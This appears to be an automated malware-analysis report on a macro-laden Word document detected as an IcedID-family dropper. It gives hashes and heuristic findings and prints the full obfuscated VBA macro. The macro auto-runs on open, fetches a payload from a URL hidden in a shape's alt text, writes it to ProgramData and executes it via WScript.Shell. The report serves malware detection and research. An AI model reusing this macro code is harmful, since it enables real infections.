Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ffabaa2fa8f2d4b9…

MALICIOUS

Office (OOXML)

Size: 98.0 KB
Created: 2020-10-13 10:41:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-16
MD5: be18db9eb8ad056aa343f2fc44c6027a
SHA-1: 223f194269da6c236ec68d19c241ea73d9e2b5ad
SHA-256: ffabaa2fa8f2d4b9079cf36c0bf0800a084cec60c2ecdeebb55fd869446c6ed2
Risk score: 230

Heuristics (6)

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set pYxxk = CreateObject("Script" + zofDr)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL  Channel
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape  In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12381 bytes
SHA-256: d183d8d7d048fc3b1b768cf8aa6de221a7bdbfe7d11beb98095a62d0c9156e12
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UCgPC"
Sub xWHOS(HcsyA, Optional ByVal HwGAX As String = "c:\programdata\PgmNn.txt", Optional ByVal zofDr As String = "ing.FileSystemObject")
' Loophole discoverer mortgagor
' Acquit recantation deadlier bedevilled dishy derogatory
' Deepening minty
' Caesar naught
' Immigrate
' Handshake spring
' Butting incipient incumbent
' Morons deprivations
' Assenting distinguishable lynching veranda plugging
' Enclaves obituaries exploitation parvenu muffin vibrato
' Described
' Twit
' Variation biotechnologists implementations prodigious haired
' Sifter nonplussed caravanning
' Random nurse
' Err dyslexically spindly thrill roebuck
' Hardiest nibbled burden
Set pYxxk = CreateObject("Script" + zofDr)
' Rings isothermally
' Tribal acknowledge courting
' Anally posters cithers detente
' Highwaymen dividing
Set kTKxs = pYxxk.CreateTextFile(HwGAX)
' Unarm
' Artefacts rissole
' Possessives zigzag maternal biz generalised
' Automorphisms door
' Prehensile reassertion devour romancing restaurant worshipped smothering
' Interacting cremations nettles discouraged
' Lifting furnishes endeavour
' Wildebeest hogs neptunium astrolabe
kTKxs.WriteLine HcsyA
' Minuted conman threateningly instigator payphones
' Brayed militias binding profoundest
' Makeover
' Slings clumsiness access sterile trackless
kTKxs.Close
' Mercuric continued
' Equitably skirmish
' Masochism seasonality
' Haemorrhoid
' Irradiating
' Iatrogenic devilishly shallots meaningless laudable
' Selfconfident relay venders charismatically solicitations represented
' Inanimate equilateral
' Comparatives decompressing laudable
' Censuses concatenate
' Polyester prospectively canny repetitively
' Dilates tied derange misplace
' Sanctity
' Nagasaki infighting heydays
' Shattering chair irrevocable wraiths supplicating mammoth drubbed
' Pizazz innovators janitors disassemble
' Satisfies sham powerless
' Imprison devoutness shuttle unaided
' Writers instils texture oriented
' Colds quizzically muses sawyer
' Romps entangler modernity equivocation lacquers
' Breweries hanged pulling rambler stagflation
' Dilutes cradle reinstate
' Vulcanism yawls nearer bloke delegate appellants
' Addressability quizzed comprehensibility
' Shakers thinking
' Semidetached
' Belongs
' Interpretation saturate lockers insinuating medical ordered
' Perfidious
' Intermissions benefits hijack grandpas croissant
' Inconsolable
' Sulk cilia mists outing
' Morse terminator lope squawks
' Refractive boorishness chop steeply
' Batting tuner
' Describe concealing
' Updatability clinching kleptomaniacs
' Unreality prevaricated
End Sub
' Inkpots footmarks team rehashing
' Blowed operands originator preps
' Articulated suet bandit linkages itchiest pantry
' Gropers profaned extramural cast coupling
' Undercurrent colonisation
' Crackles antimony pathogenesis strides unmentionable
Sub AutoOpen()
' Coalfields cleavage municipality magazines dementia
' Insecticidal bitches
' Meticulously bmus nipples
' Overused symmetry stifles
' Waltz
' Bushes sackcloth zeppelin pieces converting
' Papering eulogises
' Slam wirier muslim befriended
' Me phobic cohabitation
' Medium prosaist commentate codename remembers sellable
' Crushes quadrangle prairies substantiate
' Maintainability carnival ferocious wellingtons
' Vehicle finely hungry giddy compassion leonardo
' Horticulture placings
' Riddling flavouring purees contenders behavioural surgeries resounds forerunners
' Meet reticular producing
' Newscasters
' Camomile further bejewel ignoring
' Sculpt addling badinage diner dollar lawns dioptre
' Annuity tinkers incoming
' Baldness intervention abbots scantiness infuse kinsfolk
' Risking transparently trim chills
' Bureaux carrots snaring
' Transpositions welltried filmic dabbles
' Stroller andrew
Dim ykvFT As New njGZm
' Endorsements thermostat vertices dimension
' Outflanked counterintelligence befitting
' Sinew dioxides opting
' Branched retriever despaired lauding lurker
' Plumy
' Relationally physiology
' Bar
HcsyA = ykvFT.JnbRr("MSXML2.serverXMLHTTP")
' Duke codifications nightdresses tertiary trucks
' Flack iced
' Trilobite
' Alarmist cleanly papered polyhedra calibrates december
' Misanalysed chestnut bluebirds
' Smartened comparatives flaring fertility
' Spurning nonevent tinsels
xWHOS ZfFJa(HcsyA)
' Ironmongers oxidation naiads banalities chintzy status
' Powerfully runny creamer declamatory sensuality outspoken senhor
' Teheran headwaters
' Egged cognizance autographing repayments reliabilities
' Narrate handbill spectre
' Interface cuirass
' Cytological
' Photochemically institute martin bureaucrat
' Garnering sheet bilingualism reheat tattooed
' Lama vistas thermometers intensification pigtails
' Handovers windsurfing kangaroos expensively
UiQiN hTTUU(0) + "vr32 c:\programdata\PgmNn.txt", "ws"
End Sub
Function vaCEk(PtNSq, hAFKs)
' Moduli bridgebuilding thwarting mosaics
' Disestablished nuggets depressing
' Argued whine calumniate lorryload
' Retrained starfish
' Ramming initiating radiators
' Workfare independents cackled appealing
vaCEk = Split(PtNSq, hAFKs)
End Function

Attribute VB_Name = "HYRQB"
' Seize pettiness lunge
' Putrefaction
' Surely repudiates scenario
' Soothsayers despotism attendant
Function ZfFJa(kVhyc)
' Responding expanded frogs congratulations functioning moron
' Untried animatedly sparkles cracker cochlea
' Diacriticals
' Humility bogglingly discussing vermilion
' Hunk
' Firefight churlishly poached revolted noticing helpings
ZfFJa = StrConv(kVhyc, vbUnicode)
' Tradespeople
' Futility hers escapees
' Civilian dish lowing volume ironic
' Adroitness
End Function
' Mushrooming delaying
' Plasticised rightist myriads greener brilliancy distributivity daylong
' Disowned reckoning
' Pencil waywardness
' Celeb
' Rib mushroom
Function LCOFb()
' Thread universalist waited doped
' Tankful prohibit catnip peninsular boy
' Larynx toledo scanning officerships
' Grossed broadsides rearranging
' Interfaced castoffs stoop irked jacks vulnerabilities
' Stooges clutter dutiful
' Elicit victimising rectitude
' Assays alterable alt
' Specials sizing earnings lighting
' Spying tracking dinghy untextured renal
With ActiveDocument.shapes(1)
LCOFb = .AlternativeText
End With
End Function
' Flinch
' Backstabbing epiphenomena
' Convicted
' Bottomless brisk asymmetries nationhood
Function hTTUU(wJNpm)
' Grassroots digressions thaw
' Equivocations lithographic
' Developing poisonings transpiration
' Hatful peeled
' Endowed thousandths alkaloids
' Veined
' Taxonomies coincidentally fly washbasin
' Diagnostically entitled limericks
fdzCy = LCOFb()
SjqyB = vaCEk(fdzCy, "###")
uIOsK = SjqyB(wJNpm)
hTTUU = uIOsK
End Function

Attribute VB_Name = "njGZm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Reverse = StrNew
End Function
' Parliamentarians
' Fondle hardhitting
' Melt crock
' Gland injectable proud
' Henceforth squash bridging gruesome
' Inexpert sloppier acted goers declassification
Function JnbRr(sfcgR)
' Fainting dilapidated quenched
' Uncompromisingly hereabouts abrasive uncompromising fluently
' Electricity tentatively
' Surpass meeting
' Mortars fridays repertory
' Pins deformations
Dim uXNkK As Object
' Harpists
' Relay technologists valedictory
' Directionless repulsing unsafe
' Dress venal convincing
' Upgrading hypochondria
' Concomitant embolism grandpas adjunct
' Debater silvering reallife heists histories
' Cleaved rouge seizures slopped
' Prognosticate aisle
' Riff tun
Set uXNkK = CreateObject(sfcgR)
' Strewn part
' Blasphemous realities harmer imprecisely
' Inferences
' Liability
' Moonless dehumanised
' Bowing electrification lexically appraisingly imbecile
' Ordain executors photographers unchronicled
' Caprice hubcap plagiarised
' Housebreaker battalion megaparsec
' Occurring citruses flavour disjunction
' Conjunct overturns hastier
' Heartlessly watched finalising
' Disrespects elegantly adorns unclear diffraction
' Terrorists miscegenation
' Democrats outperforming unportable
' Sauciest peacekeepers sank
' Tolled meters
' Obstructions horns chrysalis
' Sackfuls libero prostrates
' Insularity
' Gropings nullified unanswerable reiterates
' Informing diarrhea polemicist snuffled recruitment
oejhC = hTTUU(1)
' Locatable trotted
' Flyaway
' Contention amplified unexpected
' Experienced jouster
' Multimillion decompress polemical shopkeeper disembodied servicemen title
' Copper bird doughs selfrighteousness overdosing
' Flooded unsupervised shaman optimise
' Jokily dissent
uXNkK.Open "GET", Reverse(oejhC), False
' Birefringent eulogises victimisation purification lepers
' Bleaker voyager
' Wail placings barony coarsely
' Bedspread realignment bonemeal
' Commercialisation development plagiarising plains
' Rigours guzzler proposal bumpkin felines
' Bagels winemakers mugger
uXNkK.Send
' Thermodynamically perching prickliness better
' Ambushers lifelines
' Summoned scriptwriters
' Infringed prolong vouchsafing chubby
' Iterators innocuous suffusion
' Envisage demonstrably
JnbRr = uXNkK.responsebody
End Function

Attribute VB_Name = "FROCO"
Sub UiQiN(jInFd, nSsTl)
' Embellished homological algeria brines relocate
' Dirge neaten club
' Danes selfcontrol profanely courtesan
' Hurl preens chewier hatreds vixen mega
' Observatory
' Cello pigment
' Loses
' Crumbles groats belligerent
Set kSKlf = CreateObject(nSsTl + "cript.shell")
' Inarticulate tachyon entry eclair
' Sponsorship legal
' Sebaceous tribute purifying
' Tempi subclass racily sentimentalist
' Contemplation feeble hooting atmospherically
' Toggles sunday petitioned
' Buoyancy conurbation uneasiest daunts conjured purple pulps
' Bulwark lowlands queuing biennials
' Nuzzling sugillate
' Atonic canals roaster yogi follow hoeing allure
' Grading
' Landslides sunken fee harassment
' Sculling putrefying breccias
' Rebelled illinois southern exogenously
' Hub frauds pressurise moulders
' Scabbards feminine rachis scrawled apollo thousands hypnosis
' Despairing endangers
' Accreditation architectural excitements wordiness sacraments
' Flamboyant timelapse organised secondclass sampler dial
' Fatally blasphemed diverting depiction misremembering
' Deification neutralisation archiving accede
' Panache loudly
' Dinars simulating unbuttoning delineates
' Patenting grenadier abundant proceeded snaked
' Saving hibernal liferaft mesh fragmentary
' Storybook medical
' Considers straitened occupational
' Integrands
' Envelop scared shiftier inventing
' Tools yawningly profanities
' Lawn unswappable lymphatic riposte bonded
' Suspense retraced hipbone talented covalent
' Rebound madhouse
' Rudeness baulking rowdier
' Informative convectional sewn slatted addressing attentively
' Phasing competing
' Linkups sleuth duplicity debaser
' Horoscopes monarchical uninterrupted
' Blackness filial greener rift intervenes thriving
' Beaus
' Intending wrath
' Reverential merest pageants shunts
' Wail raincloud
' Tenderness expo paratrooper curfew
' Leanings shutters hittable
' Detected convalescing carding uncorrelated
' Constant playing skinheads
' Buck ids
' Crisscrossed tunes
' Augmentation absorbed
' Glade trills disciplined equations justificatory
' Snowline consecutively
kSKlf.exec jInFd
' Sponsored virtuosi
' Palaeontological disenfranchised
' Enthralling unlocks romantics bestiary
' Subtractive print drubbing wipers
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45568 bytes
SHA-256: 421056e5a5516db8180f3f672fd9c050d5677307b116eccf08a379f1a5295548
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely